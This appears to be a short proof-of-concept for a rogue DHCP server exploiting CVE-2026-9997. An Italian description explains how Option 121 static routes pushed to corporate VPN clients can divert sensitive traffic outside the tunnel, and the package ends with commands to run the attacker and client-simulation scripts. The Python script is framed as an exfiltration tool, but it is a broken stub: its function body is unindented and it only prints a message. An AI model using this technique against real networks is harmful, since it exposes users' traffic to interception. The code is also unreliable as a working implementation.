
Server DHCP malintenzionato per CVE-2026-9997: inietta route statiche Option 121 nei client VPN, bypassando lo split tunneling per esfiltrare traffico sensibile.
#!/usr/bin/env python3
# rogue_dhcp_server.py - Injects a static route to bypass VPN split tunnel
import socket, struct, threading
def send_dhcp_offer(client_mac, offer_ip):
# Craft a DHCP OFFER packet with Option 121 (Classless Static Route)
# This option adds a route that sends traffic to a sensitive subnet via the attacker's gateway.
# We'll simulate by creating a raw packet (simplified).
# In a real attack, we'd use scapy; here we just demonstrate the concept.
print(f"Sending DHCP OFFER to {client_mac} with malicious static route...")
# The client would then apply this route and leak traffic.
Un client VPN aziendale accetta le opzioni DHCP (Opzione 121 – rotte statiche classless) provenienti dalla rete locale senza validazione. Un attaccante sulla stessa LAN può iniettare rotte che instradano il traffico sensibile al di fuori del tunnel VPN crittografato.
python rogue_dhcp_server.py
python vpn_client_sim.py